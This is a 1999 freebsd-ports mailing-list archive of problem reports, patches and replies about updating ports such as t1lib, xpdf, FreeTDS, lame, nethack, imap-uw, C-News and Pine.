$FreeBSD: ports/devel/t1lib/Makefile,v 1.6 1999/11/01 01:16:29 steve Exp $ # -DISTNAME= t1lib-0.9.2 +DISTNAME= t1lib-1.0 CATEGORIES= devel MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= libs/graphics MAINTAINER= ijliao@csie.nctu.edu.tw -WRKSRC= ${WRKDIR}/T1-0.9.2 +WRKSRC= ${WRKDIR}/T1-1.0 GNU_CONFIGURE= yes USE_GMAKE= yes diff -ruN /usr/ports/devel/t1lib/files/md5 t1lib/files/md5 --- /usr/ports/devel/t1lib/files/md5 Sun Oct 31 23:16:36 1999 +++ t1lib/files/md5 Sun Dec 12 20:33:52 1999 @@ -1 +1 @@ -MD5 (t1lib-0.9.2.tar.gz) = 31c85ba473ca9cfbd9c3948d556236e7 +MD5 (t1lib-1.0.tar.gz) = 0615be475ff42e6f47f1ce77ce29a195 diff -ruN /usr/ports/devel/t1lib/pkg/PLIST t1lib/pkg/PLIST --- /usr/ports/devel/t1lib/pkg/PLIST Sun Oct 31 23:16:37 1999 +++ t1lib/pkg/PLIST Sun Dec 12 21:15:41 1999 @@ -7,8 +7,8 @@ lib/libt1x.a lib/libt1x.la lib/libt1.so -lib/libt1.so.9 +lib/libt1.so.1 lib/libt1x.so -lib/libt1x.so.9 -share/t1lib-0.9/t1lib.config -@dirrm share/t1lib-0.9 +lib/libt1x.so.1 +share/t1lib/t1lib.config +@dirrm share/t1lib >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 16:25:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ns.itga.com.au (ns.itga.com.au [192.83.119.129]) by hub.freebsd.org (Postfix) with ESMTP id 1680414ECA for ; Sun, 12 Dec 1999 16:25:06 -0800 (PST) (envelope-from gnb@itga.com.au) Received: from lightning.itga.com.au (lightning.itga.com.au [192.168.71.20]) by ns.itga.com.au (8.9.3/8.9.3) with ESMTP id LAA60729 for ; Mon, 13 Dec 1999 11:25:02 +1100 (EST) (envelope-from gnb@itga.com.au) Received: from lightning.itga.com.au (lightning.itga.com.au [192.168.71.20]) by lightning.itga.com.au (8.9.3/8.9.3) with ESMTP id LAA20963; Mon, 13 Dec 1999 11:25:02 +1100 (EST) Message-Id: <199912130025.LAA20963@lightning.itga.com.au> X-Mailer: exmh version 2.0.1 12/23/97 From: Gregory Bond To: ports@freebsd.org Subject: new nethack version released Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 13 Dec 1999 11:25:02 +1100 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 3.3.0 released this weekend (first new version in a bazillion years). Would love to get it into the 3.4 CDs.... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 16:30: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 69FC314ECA for ; Sun, 12 Dec 1999 16:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA55053; Sun, 12 Dec 1999 16:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 5E62D14E84; Sun, 12 Dec 1999 16:27:41 -0800 (PST) Message-Id: <19991213002741.5E62D14E84@hub.freebsd.org> Date: Sun, 12 Dec 1999 16:27:41 -0800 (PST) From: lioux@linf.unb.br To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15444: Updated port: graphics/xpdf due to pending upgrade of devel/t1lib Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15444 >Category: ports >Synopsis: Updated port: graphics/xpdf due to pending upgrade of devel/t1lib >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 16:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mario Sergio Fujikawa Ferreira >Release: FreeBSD 3.4-RC >Organization: >Environment: >Description: An update of the LIB_DEPENDS line due to a pending upgrade of devel/t1lib, the refered lib has changed This update depend on PR ports/15443 >How-To-Repeat: >Fix: diff -ruN /usr/ports/graphics/xpdf/Makefile xpdf/Makefile --- /usr/ports/graphics/xpdf/Makefile Fri Dec 10 16:29:20 1999 +++ xpdf/Makefile Sun Dec 12 21:04:30 1999 @@ -22,7 +22,7 @@ MAINTAINER= chuckr@freebsd.org LIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm \ - t1.9:${PORTSDIR}/devel/t1lib + t1x.1:${PORTSDIR}/devel/t1lib .if !defined(PACKAGE_BUILDING) RESTRICTED= "Contains cryptography" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 19:36:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from sand2.sentex.ca (sand2.sentex.ca [209.167.248.3]) by hub.freebsd.org (Postfix) with ESMTP id 7371F14C01 for ; Sun, 12 Dec 1999 19:36:16 -0800 (PST) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by sand2.sentex.ca (8.8.8/8.8.8) with SMTP id WAA07768; Sun, 12 Dec 1999 22:39:07 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.1.19991212223212.0405c120@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sun, 12 Dec 1999 22:36:08 -0500 To: midom@dammit.lt From: Mike Tancsa Subject: update to FreeTDS (now version 5.0) Cc: ports@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, There is now a new version of FreeTDS. --- Makefile.orig Sun Dec 12 22:29:43 1999 +++ Makefile Sun Dec 12 22:30:21 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: freetds -# Version required: 0.47pre2 -# Date created: 02 Nov 1999 +# Version required: 0.50 +# Date created: 08 Dec 1999 # Whom: Domas Mituzas # # $FreeBSD: ports/databases/freetds/Makefile,v 1.1.1.1 1999/11/26 20:52:38 steve Exp $ -DISTNAME= freetds-0.47pre2 -PKGNAME= freetds-0.47p2 +DISTNAME= freetds-0.50 +PKGNAME= freetds-0.50 CATEGORIES= databases MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= ALPHA/freetds --- files/md5.orig Sun Dec 12 22:30:39 1999 +++ files/md5 Sun Dec 12 22:31:11 1999 @@ -1 +1 @@ -MD5 (freetds-0.47pre2.tgz) = b7e36074bf1f0e2dfbb53b1eebc9c6f0 +MD5 (freetds-0.50.tgz) = 06bfb775de2b903fd43163b102cbd16b To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 23:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D956014F5E for ; Sun, 12 Dec 1999 23:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA87732; Sun, 12 Dec 1999 23:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4C41A14F67; Sun, 12 Dec 1999 23:07:05 -0800 (PST) Message-Id: <19991213070705.4C41A14F67@hub.freebsd.org> Date: Sun, 12 Dec 1999 23:07:05 -0800 (PST) From: winard@ritax.dorm.ccu.edu.tw To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15453: Update FreeTDS from 0.47pre2 to 0.50 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15453 >Category: ports >Synopsis: Update FreeTDS from 0.47pre2 to 0.50 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 23:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yung-Jeng Hung >Release: FreeBSD 3.3-STABLE i386 >Organization: CCU CSIE, Taiwan >Environment: FreeBSD ritax.dorm.ccu.edu.tw 3.4-RC FreeBSD 3.4-RC #3: Mon Dec 13 09:14:36 CST 1999 root@ritax.dorm.ccu.edu.tw:/usr/src/sys/compile/RITAX i386 >Description: FreeTDS version 5.0 has new features such as TDS 7.0 support, hostfile BCP for dblib, writetext support for dblib, and others. There is a chage-request before (PR ports/15143, from 0.47pre2 to 0.47), but never commited. >How-To-Repeat: >Fix: diff -Nru freetds/Makefile freetds-current/Makefile --- freetds/Makefile Mon Nov 29 11:07:51 1999 +++ freetds-current/Makefile Mon Dec 13 15:00:24 1999 @@ -1,12 +1,11 @@ # New ports collection makefile for: freetds -# Version required: 0.47pre2 +# Version required: 0.50 # Date created: 02 Nov 1999 # Whom: Domas Mituzas # # $FreeBSD: /ctm/FreeBSD/anoncvs/cvs/ports/databases/freetds/Makefile,v 1.1.1. -DISTNAME= freetds-0.47pre2 -PKGNAME= freetds-0.47p2 +DISTNAME= freetds-0.50 CATEGORIES= databases MASTER_SITES= ${MASTER_SITE_SUNSITE} MASTER_SITE_SUBDIR= ALPHA/freetds @@ -17,6 +16,9 @@ WRKSRC= ${WRKDIR}/freetds GNU_CONFIGURE= yes +CONFIGURE_ARGS= --prefix=${PREFIX} \ + --with-tdsver=7.0 \ + --enable-dbmfix USE_GMAKE= yes .include diff -Nru freetds/files/md5 freetds-current/files/md5 --- freetds/files/md5 Mon Nov 29 11:07:51 1999 +++ freetds-current/files/md5 Fri Dec 10 17:42:16 1999 @@ -1 +1 @@ -MD5 (freetds-0.47pre2.tgz) = b7e36074bf1f0e2dfbb53b1eebc9c6f0 +MD5 (freetds-0.50.tgz) = 06bfb775de2b903fd43163b102cbd16b diff -Nru freetds/patches/patch-aa freetds-current/patches/patch-aa --- freetds/patches/patch-aa Thu Jan 1 08:00:00 1970 +++ freetds-current/patches/patch-aa Mon Dec 13 12:18:18 1999 @@ -0,0 +1,30 @@ +--- Makefile.in.orig Sun Dec 5 07:14:52 1999 ++++ Makefile.in Mon Dec 13 11:54:52 1999 +@@ -77,7 +77,7 @@ + EXTRA_DIST = interfaces src/tds/client.42_1 src/tds/client.42_2 + + +-DEFDIR = $(prefix) ++DEFDIR = $(prefix)/etc/freetds + ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 + mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs + CONFIG_CLEAN_FILES = +diff -ru freetds.origin/src/tds/util.c freetds/src/tds/util.c +--- src/tds/util.c.orig Fri Nov 12 09:15:05 1999 ++++ src/tds/util.c Mon Dec 13 11:51:56 1999 +@@ -261,13 +261,14 @@ + + /* + * if we haven't found the server yet then look in $SYBBASE/interfaces fil ++ * FreeBSD: $SYBBASE/etc/freetds/interfaces + */ + if (ip_addr[0]=='\0') + { + char *sybase = getenv("SYBASE"); + if (sybase!=NULL && sybase[0]!='\0') + { +- search_interface_file(sybase, "interfaces", server, ip_addr, ip_port ++ search_interface_file(sybase, "etc/freetds/interfaces", server, ip_a + } + } + diff -Nru freetds/pkg/PLIST freetds-current/pkg/PLIST --- freetds/pkg/PLIST Mon Nov 29 11:07:51 1999 +++ freetds-current/pkg/PLIST Mon Dec 13 12:10:45 1999 @@ -1,3 +1,4 @@ +etc/freetds/interfaces include/bkpublic.h include/cspublic.h include/cstypes.h @@ -11,7 +12,6 @@ include/tds.h include/tdsutil.h include/tdsver.h -interfaces lib/libct.a lib/libct.la lib/libct.so.0 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 23:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 762F014FB5 for ; Sun, 12 Dec 1999 23:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA88813; Sun, 12 Dec 1999 23:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id AA0D614D07; Sun, 12 Dec 1999 23:19:52 -0800 (PST) Message-Id: <19991213071952.AA0D614D07@hub.freebsd.org> Date: Sun, 12 Dec 1999 23:19:52 -0800 (PST) From: jblaufus@sendit.nodak.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15454: Error in lame-3.51 Makefile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15454 >Category: ports >Synopsis: Error in lame-3.51 Makefile >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 23:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jeff Blaufuss >Release: 3.2 Release >Organization: >Environment: FreeBSD durandal.localnet 3.2-REALEASE FreeBSD 3.2-RELEASE #2: Sun Nov & 13:58:57 CST 1999 root@durandal.localnet:/usr/src/sys/compile/DURANDAL i386 >Description: On line 20 of the Makefile for lame should read "gtk12:${PORTSDIR}/x11-toolkits/gtk12" instead of "gtk12.2:${PORTSDIR}/x11-toolkits/gtk12" >How-To-Repeat: compile lame from the ports collection >Fix: Change line 20 of the lame Makefile from "gtk12:${PORTSDIR}/x11-toolkits/gtk12" to "gtk12.2:${PORTSDIR}/x11-toolkits/gtk12" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 23:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 200AE14FED for ; Sun, 12 Dec 1999 23:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA90301; Sun, 12 Dec 1999 23:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 23:40:02 -0800 (PST) Message-Id: <199912130740.XAA90301@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Chris Piazza Subject: Re: ports/15454: Error in lame-3.51 Makefile Reply-To: Chris Piazza Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15454; it has been noted by GNATS. From: Chris Piazza To: jblaufus@sendit.sendit.nodak.edu Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: ports/15454: Error in lame-3.51 Makefile Date: Sun, 12 Dec 1999 23:30:15 -0800 On Sun, Dec 12 1999 at 11:19:52PM -0800, jblaufus@sendit.sendit.nodak.edu wrote: > >Description: > On line 20 of the Makefile for lame should read "gtk12:${PORTSDIR}/x11-toolkits/gtk12" > instead of "gtk12.2:${PORTSDIR}/x11-toolkits/gtk12" > >Fix: > Change line 20 of the lame Makefile from "gtk12:${PORTSDIR}/x11-toolkits/gtk12" > to "gtk12.2:${PORTSDIR}/x11-toolkits/gtk12" Sorry, which one is it? In descript you say change it to gtk12:... and in Fix you say change it to gtk12.2:... gtk12.2:${PORTSDIR}/x11-toolkits/gtk12 is what is currently in the Makefile, and it is also correct. Maybe you could paste the error you get while trying to compile lame? It's working fine here. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Dec 12 23:50: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F70214EB4 for ; Sun, 12 Dec 1999 23:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA91285; Sun, 12 Dec 1999 23:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 23:50:02 -0800 (PST) Message-Id: <199912130750.XAA91285@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: asami@FreeBSD.org (Satoshi - Ports Wraith - Asami) Subject: Re: ports/15442: Patch for ports/games/nethack Reply-To: asami@FreeBSD.org (Satoshi - Ports Wraith - Asami) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15442; it has been noted by GNATS. From: asami@FreeBSD.org (Satoshi - Ports Wraith - Asami) To: David Scheidt Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: ports/15442: Patch for ports/games/nethack Date: 12 Dec 1999 23:47:00 -0800 * From: David Scheidt * 3.3.0 has a bunch of changes to it. They have seperated out character class * from race, for instance. The net effect is that the saved-game files are * not compatible. So I think there needs to be both a 3.2.3 and 3.3.0 * version. I'll take a look at 3.3.0, and seee if I can get it built. Ok. Please let me know when you have a 3.3.0 port ready, and I'll do a repo copy. -PW To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 6:53:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id 863D7154FA for ; Mon, 13 Dec 1999 06:53:00 -0800 (PST) (envelope-from ady@warpnet.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id QAA39144; Mon, 13 Dec 1999 16:54:04 +0200 (EET) (envelope-from ady@warpnet.ro) Date: Mon, 13 Dec 1999 16:54:04 +0200 (EET) From: Adrian Penisoara To: Akinori MUSHA aka knu Cc: freebsd-ports@freebsd.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: <86d7sc59uy.wl@localhost.local.idaemons.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Mon, 13 Dec 1999, Akinori MUSHA aka knu wrote: > Hi, > > At Sat, 11 Dec 1999 18:10:07 +0200 (EET), > Adrian Penisoara wrote: > > What bothers me is that I never found time to work on this; you're > > welcome to take maintainership of the port if you feel (and it seems you > > are) better suited to maintain it! > > > > It's just that I would like you to take the good ideeas that I and my > > predecesors have put in -- like shared library building & versioning and > > preparing a strategy for separating the c-client library from Pine & > > imap/pop daemons (did you notice that both Pine & imap-uw compile the same > > library sources ?)... > > Yes, and I've been trying to port imap-utils which also use > the c-client library. Actually I've already had them work with the > shlib, but now having a problem that they always try to connect to > servers via rsh... I'm analyzing it. How I would like it to be: one port that installs ONLY the c-client library and the rest of the ports depending on it -- so that no longer two ports build the same library twice... > > > So, if you feel like jumpin' in the maintainer "business" just step > > forward ;-) ! > > Well, I know you are a pine user but I'm not, and no doubt > you are the one who should maintain pine & imap-uw simultaneously. I > just worried about your load. I am too ;-) ... But I have good news: today I'm going to take home my newly acquired machine (a second hand Pentium) and hopefully that will increase my "availability" ! > > Anyway, I'd like to work with you. I'd appreciate it if you > could give me some advice about my future work. Thanks. I'd be glad to share knowaledges with you ! PS: I'm waiting for those patches Steve requested you to resend, but in the mean time I'll check out what you posted. Thanks, Ady (@warpnet.ro) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 7:40:49 1999 Delivered-To: freebsd-ports@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id CEE3815422 for ; Mon, 13 Dec 1999 07:40:45 -0800 (PST) (envelope-from jcm@dogma.freebsd-uk.eu.org) Received: from dogma.freebsd-uk.eu.org ([130.88.200.97]) by probity.mcc.ac.uk with esmtp (Exim 1.92 #3) for freebsd-ports@freebsd.org id 11xXae-000GuV-00; Mon, 13 Dec 1999 15:40:44 +0000 Received: from localhost (jcm@localhost) by dogma.freebsd-uk.eu.org (8.9.3/8.9.3) with ESMTP id PAA75206 for ; Mon, 13 Dec 1999 15:40:44 GMT (envelope-from jcm@dogma.freebsd-uk.eu.org) Date: Mon, 13 Dec 1999 15:40:44 +0000 (GMT) From: Jonathon McKitrick To: freebsd-ports@freebsd.org Subject: pine filtering Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I read the FM and checked the website, and the filtering documentation is useless or non-existent. Has anyone had any luck with setting up filters on INBOXes with Pine 4.21? -jm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 9:13: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ms.tokyo.jcom.ne.jp (ms.tokyo.jcom.ne.jp [210.234.123.18]) by hub.freebsd.org (Postfix) with ESMTP id E5C5415131 for ; Mon, 13 Dec 1999 09:13:02 -0800 (PST) (envelope-from musha@ms.tokyo.jcom.ne.jp) Received: from daemon.local.idaemons.org (pc343031.tokyo.jcom.ne.jp [203.140.143.31]) by ms.tokyo.jcom.ne.jp (8.9.1/3.7W 06/01/99) with ESMTP id CAA05648; Tue, 14 Dec 1999 02:12:17 +0900 (JST) Received: by daemon.local.idaemons.org (8.9.3/3.7W) id CAA04725; Tue, 14 Dec 1999 02:11:46 +0900 (JST) Date: Tue, 14 Dec 1999 02:11:44 +0900 Message-ID: <8666y2hijz.wl@localhost.local.idaemons.org> From: Akinori MUSHA aka knu To: ady@warpnet.ro, freebsd-ports@freebsd.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: In your message of "Mon, 13 Dec 1999 16:54:04 +0200 (EET)" References: <86d7sc59uy.wl@localhost.local.idaemons.org> User-Agent: Wanderlust/2.2.12 (Joyride) SEMI/1.13.7 (Awazu) PGPGPG FLIM/1.13.2 (Kasanui) MULE XEmacs/21.1 (patch 8) (Bryce Canyon) (i386--freebsd) Organization: A.I.D. MIME-Version: 1.0 (generated by SEMI 1.13.7 - "Awazu") Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, At Mon, 13 Dec 1999 16:54:04 +0200 (EET), Adrian Penisoara wrote: > How I would like it to be: one port that installs ONLY the c-client > library and the rest of the ports depending on it -- so that no longer two > ports build the same library twice... That's a good idea. And I think "mail/libc-client" should install more header files other than what imap-uw currently does, such as "osdep.h" and "misc.h" that are used by some c-client programs. > But I have good news: today I'm going to take home my newly acquired > machine (a second hand Pentium) and hopefully that will increase my > "availability" ! Wonderful. You're gonna turn a secondhand machine into one of the most CURRENT! Actually I also have a Pentium-class machine which runs 3-STABLE providing a lot of kind of servives including IMAP4. Amazing power to serve, yeah. > I'd be glad to share knowaledges with you ! Glad to hear that. > the mean time I'll check out what you posted. When you meet whitespace issue, try patch's "-l" option. -- / /__ __ / ) ) ) ) / http://www.idaemons.org/knu/ Akinori MUSHA aka / (_ / ( (__( mailto:knu@idaemons.org "We are but hungry.. Associated Ita-meshi Daemons!" http://www.idaemons.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 9:30: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C6D3151F8 for ; Mon, 13 Dec 1999 09:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA02034; Mon, 13 Dec 1999 09:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.dinoex.sub.org (mail.dinoex.sub.de [195.243.29.14]) by hub.freebsd.org (Postfix) with ESMTP id E23B31546B for ; Mon, 13 Dec 1999 09:25:46 -0800 (PST) (envelope-from dm@home.dinoex.sub.org) Received: (from uucp@localhost) by mail.dinoex.sub.org (8.9.3/8.9.3) with UUCP id SAA02785 for FreeBSD-gnats-submit@freebsd.org; Mon, 13 Dec 1999 18:14:11 +0100 (CET) Received: (from uucp@localhost) by net2.dinoex.sub.org (8.9.3/8.9.3) with UUCP id RAA26088 for FreeBSD-gnats-submit@freebsd.org; Mon, 13 Dec 1999 17:37:08 +0100 (CET) Received: (from dm@localhost) by home.dinoex.sub.org (8.9.3/8.9.3) id QAA62223; Mon, 13 Dec 1999 16:37:29 +0100 (CET) Message-Id: <199912131537.QAA62223@home.dinoex.sub.org> Date: Mon, 13 Dec 1999 16:37:29 +0100 (CET) From: dirk.meyer@dinoex.sub.org Reply-To: dirk.meyer@dinoex.sub.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15459: news/cnews fix for gawk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15459 >Category: ports >Synopsis: news/cnews for for gawk >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 09:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Dirk Meyer >Release: FreeBSD 3.3-RELEASE i386 >Organization: privat >Environment: FreeBSD 3.3 current awk (gawk 3.0.4) >Description: Regression check fails (make check) News system crash, cause awk corrupts active >How-To-Repeat: >Fix: diff cnews/Makefile cnews-cr.g/Makefile --- cnews/Makefile Fri Dec 3 08:35:58 1999 +++ cnews-cr.g/Makefile Mon Dec 13 15:59:00 1999 @@ -29,6 +29,7 @@ c-news-patch-doexpire c-news-patch-queuelen.tay \ c-news-patch-bunzip2 \ c-news-patch-ctl-underscore \ + c-news-patch-y2k \ c-news-patch-pgpverify-1.12 MAINTAINER= dirk.meyer@dinoex.sub.org @@ -60,8 +61,11 @@ .if ${OSVERSION} < 300000 .else -BROKEN= gawk need to be updated to 3.0.4 +PATCHFILES+= c-news-patch-gawk3 .endif + +check: + cd ${WRKSRC} && ${MAKE} -$(MAKEFLAGS) r pre-patch: @${CP} ${DISTDIR}/${DIST_SUBDIR}/${PGPVERIFY} ${WRKSRC}/${PGPVERIFY} diff cnews/files/md5 cnews-cr.g/files/md5 --- cnews/files/md5 Thu Jun 10 10:00:12 1999 +++ cnews-cr.g/files/md5 Mon Dec 13 16:07:34 1999 @@ -11,4 +11,6 @@ MD5 (c-news/c-news-patch-queuelen.tay) = 58d3e06a518fbf6bfee10081041fb85c MD5 (c-news/c-news-patch-bunzip2) = c4893fcaec140b29f1bea42b81e1bdf5 MD5 (c-news/c-news-patch-ctl-underscore) = 65ddefc8be3793cfc9d1e6d5b8302fd4 +MD5 (c-news/c-news-patch-y2k) = dc0587ac97c7795362558e90180ae8fa MD5 (c-news/c-news-patch-pgpverify-1.12) = 275fdc61a7473af2bbdc0b94aece5aa1 +MD5 (c-news/c-news-patch-gawk3) = 029502040db18868fe10e4c991af22ef >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 10:18:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from luna.cdrom.com (luna.cdrom.com [204.216.28.135]) by hub.freebsd.org (Postfix) with ESMTP id 8105E1506A for ; Mon, 13 Dec 1999 10:18:23 -0800 (PST) (envelope-from jim@luna.cdrom.com) Received: (from jim@localhost) by luna.cdrom.com (8.9.3/8.9.3) id KAA01040; Mon, 13 Dec 1999 10:16:34 -0800 (PST) (envelope-from jim) Date: Mon, 13 Dec 1999 10:16:34 -0800 From: Jim Mock To: Jonathon McKitrick Cc: freebsd-ports@FreeBSD.ORG Subject: Re: pine filtering Message-ID: <19991213101634.C703@luna.cdrom.com> Reply-To: jim@luna.cdrom.com References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.1.1i In-Reply-To: ; from jcm@dogma.freebsd-uk.eu.org on Mon, Dec 13, 1999 at 03:40:44PM +0000 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 13 Dec 1999 at 15:40:44 +0000, Jonathon McKitrick wrote: > I read the FM and checked the website, and the filtering documentation > is useless or non-existent. Has anyone had any luck with setting up > filters on INBOXes with Pine 4.21? You want to use procmail. For more information, look at the Filtering Mail FAQ'.. http://www.faqs.org/faqs/mail/filtering-faq/preamble.html FYI, procmail is in the ports collection.. /usr/ports/mail/procmail 